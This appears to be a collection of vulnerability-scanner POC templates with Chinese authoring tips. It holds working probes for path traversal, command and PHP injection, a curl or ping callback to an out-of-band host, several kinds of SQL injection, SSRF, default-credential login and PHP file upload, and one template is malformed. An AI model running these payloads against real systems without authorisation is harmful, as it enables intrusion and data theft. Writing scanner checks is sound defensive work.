/etc/passwd
c:/windows/win.ini
id
ls
rev
{{randstr}}
| rev

不要写成只有 `response.status == 200` 这样的规则：这样基本等于只是多发了一个请求，对漏洞本身没有任何验证。理论上漏洞响应多少都应该有一些可以匹配的特征（特定的页面标题、回显的随机串、读到的文件内容等），表达式应该去匹配这些特征，而不是只看状态码。

name: poc-yaml-test-unauth
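# Unauthenticated-access check: one GET to the admin page.  The status code
# alone is not evidence (a login page can also answer 200), so the expression
# additionally requires two page-specific markers.
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      path: /admin/
    # Several fixed fragments are required so a generic 200 page is not reported.
    expression: response.status == 200 && response.body_string.contains("<title>Admin</title>") && response.body_string.contains("<h2>DController</h2>")
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com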
manual: true
transport: http
rules:
linux:
request:
cache: true
method: GET
path: /test/../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
windows:
request:
cache: true
method: GET
path: /test/../../../../Windows/win.ini
expression: response.status == 200 && response.body_string.contains("for 16-bit app support")
expression: linux() || windows()
detail:
author: test
links:
- https://www.test.com
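name: poc-yaml-test
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: GET
      # Arbitrary file read through the filePath parameter; web.config is
      # chosen because its structure is predictable even when its values are not.
      path: /test.aspx?filePath=../../web.config
      follow_redirects: true
    # No status check is made; the evidence is three fragments expected in the
    # target's web.config, all of which must be present.
    expression: response.body_string.contains('<add key="MyServerIP"') && response.body_string.contains('<add name="ConnectionString" connectionString="') && response.body_string.contains('<sessionState mode="InProc"')
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com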
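name: poc-yaml-test-php-rce
manual: true
transport: http
set:
  # Two random operands: the response must contain the *result* of the
  # subtraction, which a server that merely echoes the request body never
  # produces.  s2 < s1 always holds, so the result is negative and cannot
  # collide with either operand.
  s1: randomInt(100000000, 200000000)
  s2: randomInt(10000, 20000)
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /index.php
      headers:
        Content-Type: application/x-www-form-urlencoded
      # PHP short-echo tag.
      body: <?={{s2}}-{{s1}};
    # Operand order in the expression must mirror the order in the body.
    expression: response.status == 200 && response.body_string.contains(string(s2 - s1))
expression: r0()
detail:
  author: test
  links:
    - https://test.com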
也可以使用 `bstartsWith` 方法，或者尝试匹配网页中的其他特征。例如，计算的结果直接返回、并无其他附加内容时，就可以使用 `response.body.bstartsWith(bytes(string(s2 - s1)))`（注意表达式里的运算顺序必须与请求体中 `{{s2}}-{{s1}}` 的顺序一致，否则符号相反、永远匹配不上）。
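name: poc-yaml-test-rce
manual: true
transport: http
set:
  # Random operands: only a command that was really evaluated can produce the
  # expected value; an echoed payload contains the operands but not the result.
  s1: randomInt(100000, 200000)
  s2: randomInt(10000, 20000)
rules:
  # Windows
  r0:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/x-www-form-urlencoded
      # NOTE(review): `set /A` prints its result when run from a command line,
      # not from inside a batch file -- confirm how the target executes it.
      body: |
        id=set /A {{s2}}-{{s1}}
    expression: response.status == 200 && response.body_string.contains(string(s2 - s1))
  r1:
    request:
      cache: true
      method: POST
      path: /test2
      headers:
        Content-Type: application/x-www-form-urlencoded
      # File-read variant for hosts where arithmetic output is not echoed.
      body: |
        id=type c:/windows/win.ini
    expression: response.status == 200 && response.body_string.contains("for 16-bit app support")
  # Linux
  r2:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        id=expr {{s1}} - {{s2}}
    # s1 - s2 here (positive), matching the operand order in the body.
    expression: response.status == 200 && response.body_string.contains(string(s1 - s2))
  r3:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/x-www-form-urlencoded
      # Alternative for hosts without expr; requires bc to be installed.
      body: |
        id=echo {{s1}}-{{s2}}|bc
    expression: response.status == 200 && response.body_string.contains(string(s1 - s2))
  r4:
    request:
      cache: true
      method: POST
      path: /test1
      headers:
        Content-Type: application/x-www-form-urlencoded
      body: |
        id=cat /etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
# Any one probe succeeding is enough; the others are platform fallbacks.
expression: r0() || r1() || r2() || r3() || r4()
detail:
  author: test
  links:
    - http://test.com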
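name: poc-yaml-test
manual: true
transport: http
set:
  # Out-of-band (reverse) check for blind command execution: the target must
  # call back to the listener, so no command output has to appear in the response.
  reverse: newReverse()
  reverseURL: reverse.url
  reverseDomain: reverse.domain
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /run
      # `+` presumably becomes a space once the target form-decodes the body;
      # `ls|` only serves to prove that a pipeline is executed.
      body: test=ls|curl+{{reverseURL}}
    # reverse.wait(5) blocks up to 5 s for the callback.  "xxxx" is a
    # placeholder marker to be replaced per target.
    expression: reverse.wait(5) && response.body_string.contains("xxxx")
  r1:
    request:
      cache: true
      method: POST
      path: /run
      # Fallback for hosts without curl: a DNS lookup of the reverse domain is
      # enough.  The variable must be interpolated with {{ }}, otherwise the
      # literal text "reverseDomain" is sent.  Without a count flag
      # (ping -c 1 / -n 1) the command may keep running until the request times out.
      body: test=ls|ping+{{reverseDomain}}
    expression: reverse.wait(5) && response.body_string.contains("xxxx")
expression: r0() || r1()
detail:
  author: test
  links:
    - http://test.com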
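name: poc-yaml-test-sqli
manual: true
transport: http
set:
  # Random seed: the response must contain md5(s1), which only the database
  # computes; reflecting the query string yields the seed, never the hash.
  s1: randomInt(100000, 200000)
rules:
  r0:
    request:
      cache: true
      method: GET
      # UNION-based probe with a single column; a target whose query selects
      # more columns needs the column count adjusted or the UNION errors out.
      path: /index.jsp?id=1%27%20union%20select%20md5({{s1}})
      follow_redirects: true
    # Matches 28 of the 32 hash characters (offset 2), presumably so that
    # truncation or wrapping at the edges of the echoed value does not cause a miss.
    expression: response.body_string.contains(substr(md5(string(s1)), 2, 28))
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com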
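name: poc-yaml-test-sqli
manual: true
transport: http
set:
  # Random seed so the expected hash cannot be guessed or pre-baked into a page.
  s1: randomInt(100000, 200000)
rules:
  r0:
    request:
      cache: true
      method: GET
      # Error-based probe: updatexml() leaks the concatenated value in its
      # XPATH syntax error; 0x7e is "~", which delimits the leaked value.
      path: /index.jsp?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20md5({{s1}})),0x7e),1)--
      follow_redirects: true
    # MySQL truncates the XPATH error text to 32 characters, so "~" plus the
    # full 32-char hash never fits; a 28-char slice from offset 2 lies inside
    # the part that survives.
    expression: response.body_string.contains(substr(md5(string(s1)), 2, 28))
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com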
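name: poc-yaml-test
manual: true
transport: http
set:
  s1: randomLowercase(5)
  a1: randomInt(10000, 100000)
  # a2 is derived from a1 so the two can never be equal: r0 relies on
  # a1 = a2 being FALSE, and two independent draws would collide occasionally.
  a2: a1 + randomInt(1, 10000)
rules:
  # Boolean-based check: the same injection point is sent once with a false
  # condition and once with a true one; only a *different* answer for the two
  # cases is evidence, since both replies are error pages.
  r0:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/x-www-form-urlencoded
      # False branch: a1 != a2.
      body: id=aaa%27 and {{a1}}={{a2}} and %27{{s1}}%27=%27{{s1}}
      follow_redirects: true
    expression: response.body_string.contains("User authentication Failed")
  r1:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/x-www-form-urlencoded
      # True branch: a1 = a1.
      body: id=aaa%27 and {{a1}}={{a1}} and %27{{s1}}%27=%27{{s1}}
      follow_redirects: true
    expression: response.body_string.contains("User Login Failed for XXXXXX User")
# Both branches must behave as predicted.
expression: r0() && r1()
detail:
  author: test
  links:
    - https://www.test.com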
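name: poc-yaml-test-sqli
manual: true
transport: http
set:
  # Two distinct sleep lengths: r2 must be slower than the baseline but faster
  # than r1, which rules out a server that is merely slow or overloaded.
  sleepSecond1: randomInt(5, 8)
  sleepSecond2: randomInt(2, 4)
rules:
  # Baseline: SLEEP(0) records the normal latency of the endpoint.
  r0:
    request:
      cache: true
      method: GET
      path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP(0))))%23
    # "xxxx" is a placeholder for a marker that the normal page contains.
    expression: response.status == 200 && response.body_string.contains("xxxx")
    output:
      r0latency: response.latency
  r1:
    request:
      cache: true
      method: GET
      # Must exceed the longest possible sleep (8 s) or the read aborts early.
      read_timeout: "10"
      path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP({{sleepSecond1}}))))%23
    # latency is in milliseconds, hence the * 1000.  If the condition is
    # evaluated once per matching row the delay multiplies, which still
    # satisfies the >= check.
    expression: response.latency - r0latency >= sleepSecond1 * 1000 && response.body_string.contains("xxxx")
    output:
      r1latency: response.latency
  r2:
    request:
      cache: true
      method: GET
      read_timeout: "10"
      path: /user/test.php?id=1%27)%20AND%20(SELECT(SELECT(SLEEP({{sleepSecond2}}))))%23
    # Shorter sleep must land between baseline and r1 -- the ordering check.
    expression: response.latency - r0latency >= sleepSecond2 * 1000 && response.latency < r1latency && response.body_string.contains("xxxx")
expression: r0() && r1() && r2()
detail:
  author: test
  links:
    - http://test.com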
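name: poc-yaml-test-url
manual: true
transport: http
set:
  # randomUrl is defined but not referenced by any rule below.
  randomUrl: |
    "http://" + randomLowercase(6) + ".com"
  reverse: newReverse()
  reverseUrl: reverse.url
rules:
  # Direct check: fetch a well-known public page through the SSRF and match
  # its fixed content.  Requires outbound internet access from the target.
  r1:
    request:
      cache: true
      method: GET
      path: /user/test.php?url=example.com
      follow_redirects: true
    expression: response.status == 200 && response.body_string.contains("<title>Example Domain</title>") && response.body_string.contains("<h1>Example Domain</h1>")
  # Only for targets that cannot reach the internet: the reverse listener
  # observes the callback instead of the response content.
  r2:
    request:
      cache: true
      method: GET
      path: /user/test.php?url={{reverseUrl}}
    # Requiring 200 can hide a genuine callback whose page answers non-200;
    # drop the status clause if the endpoint does not return 200 on success.
    expression: response.status == 200 && reverse.wait(3)
expression: r1() || r2()
detail:
  author: test
  links:
    - http://test.com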
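name: poc-yaml-activemq-weak-password
manual: true
transport: http
payloads:
  payloads:
    # One credential pair per entry; entries are tried in turn.  The raw
    # strings (r"...") are CEL literals, not interpolation templates.
    p1:
      username: r"admin"
      password: r"admin"
      auth: base64(username + ":" + password)
rules:
  # Pre-check: the console must actually demand authentication, otherwise a
  # 200 from the next step proves nothing about the password.
  check:
    request:
      cache: true
      method: GET
      path: /admin/
    expression: response.status == 401 && response.body.bcontains(b"Unauthorized")
  auth:
    request:
      # Not cached: the same path is requested with a different Authorization
      # header for every payload.
      cache: false
      method: GET
      path: /admin/
      headers:
        Authorization: Basic {{auth}}
    # Two console-specific fragments, so a 200 login/redirect page is not
    # mistaken for a successful login.
    expression: response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
expression: check() && auth()
detail:
  author: Chaitin
  links:
    - http://test.com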
`multipart/form-data; boundary=---------------------------16314487820932200903769468567`
中的 boundary 应随机化：固定的 boundary 会成为扫描器的特征，容易被 WAF/IDS 按签名拦截（可以像下面的例子一样用 `randomLowercase` 生成）。

name: poc-yaml-test
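# Unrestricted file upload check: upload a tiny PHP file, locate it from the
# upload response, then request it and look for its output.
manual: true
transport: http
set:
  # Random file-name stem: proves the stored file is ours.
  s1: randomLowercase(20)
  # Random marker printed by the uploaded script.
  s2: randomLowercase(20)
  # Random multipart boundary so the request carries no fixed signature.
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      # Double-quoted YAML scalar; the trailing backslashes join the lines and
      # the explicit \r\n sequences form the multipart framing.  The script
      # echoes the marker and then unlinks itself so it does not remain as a
      # usable shell -- but only if r1 actually executes it; an upload that is
      # never executed leaves the file on the target.
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"file-upload\"; filename=\"{{s1}}.php\"\r\n\
        Content-Type: application/octet-stream\r\n\
        \r\n\
        <?php echo \"{{s2}}\"; unlink(__FILE__); ?>\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
      follow_redirects: false
    expression: response.status == 200 && response.body_string.contains(s1)
    output:
      # Take the first double-quoted token from the upload response and use it
      # as the storage directory in r1 -- assumes the application answers with
      # something like "<dir>" (TODO confirm the response format per target).
      search: '"(?P<tmp>.+?)".bsubmatch(response.body)'
      tmp: search["tmp"]
  r1:
    request:
      cache: true
      method: GET
      path: /test/{{tmp}}/{{s1}}.php
      follow_redirects: false
    # Only the *executed* script prints s2; a stored-but-not-run file does not.
    expression: response.status == 200 && response.body_string.contains(s2)
expression: r0() && r1()
detail:
  author: test
  links:
    - https://test.com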
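name: poc-yaml-test
manual: true
transport: http
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /test
      headers:
        Content-Type: application/xml
      # XML-RPC call whose string parameter is used as a file path; /etc/passwd
      # makes this Linux-only.
      body: "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall>\r\n<methodName>WorkflowService.getAttachment</methodName>\r\n<params><param><value><string>/etc/passwd</string>\r\n</value></param></params></methodCall>"
    # The attachment comes back base64-encoded inside <base64>...</base64>, so
    # it is decoded before matching.  "[x*]" is a character class (x or *),
    # covering both forms of the root entry's password field.  If no <base64>
    # element is present the ["base64"] index has nothing to return and the
    # rule is expected to evaluate false (TODO confirm missing-key semantics).
    expression: response.status == 200 && "root:[x*]:0:0:".matches(base64Decode("<base64>(?P<base64>.*)</base64>".bsubmatch(response.body)["base64"]))
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com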
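name: poc-yaml-test
manual: true
transport: http
set:
  # Lower-case random token: the response must contain its UPPER-CASE form,
  # which only happens if the SQL was really executed, not merely reflected.
  rs: randomLowercase(20)
rules:
  r0:
    request:
      method: GET
      path: /?sql=select UPPER('{{rs}}')
    expression: response.body_string.contains(upper(rs))
expression: r0()
detail:
  author: test
  links:
    - https://www.test.com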
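name: poc-yaml-test
# Fingerprint POC: it identifies a service rather than a vulnerability, so it
# is not marked manual.
manual: false
transport: tcp
rules:
  r0:
    request:
      # memcached's text protocol needs a line terminator after the command;
      # unless the transport appends one itself, a bare "stats" leaves the
      # server waiting for more input until read_timeout expires.
      content: "stats\r\n"
      read_timeout: "3"
    # Two STAT lines are required so that an unrelated "STAT" banner does not match.
    expression: response.raw.bcontains(b"STAT pid") && response.raw.bcontains(b"STAT version")
    output:
      # Single-quoted YAML, so the doubled backslashes reach the expression
      # parser unchanged.
      version: '"STAT version (?P<version>[\\d\\.]+)".bsubmatch(response.raw)["version"]'
      host: response.conn.destination.addr
expression: r0()
detail:
  author: test
  fingerprint:
    infos:
      - name: "memcache"
        version: "{{version}}"
    host_info:
      hostname: "{{host}}"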